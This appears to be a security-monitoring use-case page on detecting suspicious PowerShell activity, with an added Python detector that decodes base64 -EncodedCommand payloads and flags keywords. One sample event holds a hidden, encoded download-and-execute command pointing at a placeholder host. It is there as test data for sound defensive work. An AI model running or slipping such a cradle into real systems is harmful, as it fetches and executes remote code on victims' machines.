Suspicious Powershell Activity

Description

Triggered when a possibly malicious PowerShell command is executed. This anomaly contains detection methods that inspect endpoint and Windows event logs for suspicious commands (e.g., base64-encoded PowerShell commands).
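
The following is an added example of the kind of check this description refers to, not code from Splunk Security Essentials: it pulls the `-EncodedCommand` argument out of process command lines, decodes the UTF-16LE base64 payload, and rates the result against a short marker list. Field names (`Host`, `CommandLine`), the marker list and the sample events are assumptions constructed for the example.

```python
import base64
import re

# PowerShell accepts -e, -ec and -enc as abbreviations of -EncodedCommand.
ENCODED_FLAG_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Illustrative markers only; a production rule would carry a tuned list.
SUSPICIOUS_MARKERS = ("invoke-expression", "iex", "downloadstring",
                      "frombase64string", "-nop", "-w hidden", "bypass")


def extract_encoded(cmdline):
    """Return (blob, decoded). blob is None when no encoded flag is present;
    decoded is None when the blob is not valid base64 / UTF-16LE."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None, None
    blob = m.group(1)
    try:
        return blob, base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return blob, None  # present but undecodable: still worth surfacing


def scan_events(events):
    """Yield one alert per event that carries an encoded command."""
    alerts = []
    for ev in events:
        blob, decoded = extract_encoded(ev["CommandLine"])
        if blob is None:
            continue  # plain command lines are outside this rule's scope
        if decoded is None:
            alerts.append({"Host": ev["Host"], "decoded": None,
                           "hits": [], "severity": "medium"})
            continue
        # Drop the blob before matching so base64 noise cannot hit a marker.
        text = (ev["CommandLine"].replace(blob, "") + " " + decoded).lower()
        hits = [mk for mk in SUSPICIOUS_MARKERS if mk in text]
        alerts.append({"Host": ev["Host"], "decoded": decoded,
                       "hits": hits, "severity": "high" if hits else "low"})
    return alerts


def make_encoded(script):
    """Encode a script the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample 4688-style events, not real telemetry.
SAMPLE_EVENTS = [
    {"Host": "WS01", "CommandLine": "powershell.exe -NoProfile Get-Process"},
    {"Host": "WS02", "CommandLine": "powershell.exe -nop -w hidden -enc " + make_encoded(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"Host": "WS03", "CommandLine": "powershell.exe -EncodedCommand " + make_encoded("Get-ChildItem C:\\Temp")},
    {"Host": "WS04", "CommandLine": "powershell.exe -enc QUJDQUJDQUJDQUJDQUJD"},  # odd byte count
]
```

Running `scan_events(SAMPLE_EVENTS)` raises WS02 as high, WS03 as low (encoded but benign) and WS04 as medium (encoded flag with an undecodable payload).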


Use Case

Advanced Threat Detection, Security Monitoring

Category

Endpoint Compromise, Lateral Movement

Alert Volume

Medium

Journey

Stage 6

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

PowerShell

Data Sources

Windows Security